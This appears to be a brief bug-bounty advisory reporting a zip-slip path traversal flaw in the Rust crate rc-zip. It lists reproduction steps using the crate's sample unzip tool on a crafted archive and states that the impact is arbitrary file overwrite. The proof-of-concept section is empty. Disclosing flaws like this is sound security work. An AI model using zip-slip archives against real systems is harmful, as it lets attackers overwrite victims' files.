Path Traversal in rust-compress/rc-zip
Valid
Reported on
Feb 7th 2021
:book: Description
rc-zip
Pure rust zip & zip64 reading and writing. this package is vulnerable for zip-slip
https://github.com/rust-compress/rc-zip https://crates.io/crates/rc-zip
:recycle: Steps To Reproduce-:
- download and run latest release from https://github.com/rust-compress/rc-zip
- run by
git clone https://github.com/rust-compress/rc-zip
cargo build samples/jean/src/main.rs
then run by ./target/debug/jean unzip slip.zip
:telescope: POC
💥 Impact
arbitrary file overwrite
to join this conversation